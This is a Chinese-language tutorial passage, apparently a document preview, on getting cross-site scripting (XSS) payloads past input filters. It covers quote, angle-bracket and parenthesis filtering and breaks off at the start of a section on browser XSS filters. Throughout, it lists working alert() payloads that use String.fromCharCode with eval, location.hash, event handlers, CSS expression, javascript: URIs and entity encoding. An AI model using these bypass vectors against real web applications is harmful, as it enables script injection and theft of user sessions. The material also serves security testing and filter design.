(跨站测试与利用中的绕过技术.docVIP

1.1 bypass Char 通常有安全意识的程序员往往会对输入进行一定的过滤，比较常见的是针对某一关键符号进行过滤，比如“”或者“”，这种方式很多时候是无法防止攻击的，更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。 本节主要针对单字符过滤进行研究，分为引号、尖括号、括号这三个符号进行研究。 1.1.1 引号 在跨站测试中很多的vector(即攻击向量)本身是不包含引号的，例如下面的一些vector。但是在利用中经常需要使用引号，如果对引号进行了过滤，可以采取如下措施进行绕过。 vector: scriptalert(/insight-labs/)/script iframe/onload=alert(/insight-labs/) img src=x onerror=alert(/insight-labs/) p onmouseover=alert(/insight-labs/)insight-labs here./p 1)String.fromCharCode fromCharCode可以对利用代码中的引号进行编码处理，但是需要利用eval函数结合进行使用，例如: scriptalert(‘insight-labs’)/script —– scripteval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))/script 2)location.hash 将带有引号的内容放在location.hash中，其实这个也可以突破跨站长度的控制。 scripteval(location.hash.slice(1))/script#alert(‘a’) 3)/string/.source /string/中的string表示的是正则表达式，用.source则可以取到正则表达式的文本形式，然后使用eval(/string/.source);就可以执行。 1.1.2 尖括号 通常程序员为了偷懒都只会过滤尖括号，因此尖括号在跨站过滤中遇到情况最多。一般情况下如果输入没有显示在其他标签里，那么基本上是没有办法进行攻击的，但是如果是输出到其他标签里，则可以结合上下标签进行如下测试： 1）事件函数 常用的一些事件函数有：onerror、onmouseover、onload等(同时可以关注下HTML5新标签)，需要的时候可以对JavaScript的事件函数进行fuzz。 img src=x onerror=alert(/insight-labs/) p onmouseover=alert(/insight-labs/)insight-labs here./p frameset onload=alert(/insight-labs/) body onload=alert(/insight-labs/) 2)style与expression 通过标签的style样式进行跨站(测试中只有IE成功，同时还得考虑filter问题)。 div style=”width:expression(alert(‘insight-labs’));” 3) JavaScript伪协议 JavaScript伪协议进行绕过。 img src=javascript:alert(‘insight-labs’) （仅IE6) 1.1.3 括号 如果测试中发现括号被过滤了，或者无法注入括号，可以进行如下测试： 1）外部文件 通过src引入外部文件，而利用代码放在外部文件中（其中外部文件的后缀可以不为js）。 script src=’1.js’/script script src=’2.jpg’/script 2）hex、dec编码 利用十六进制与十进制进行编码。 div style=”#119#105#100#116#104#58#101#120#112#114#101#115#115#105#111#110#40#97#108#101#114#116#40#39#120#115#115#101#114#39#41#41″xsser/div 1.2 bypass filter 针对跨站问题日益严重，浏览器厂商从自身浏览器安全出发推出了各自的跨站过滤器。但是这类过滤器基本上只支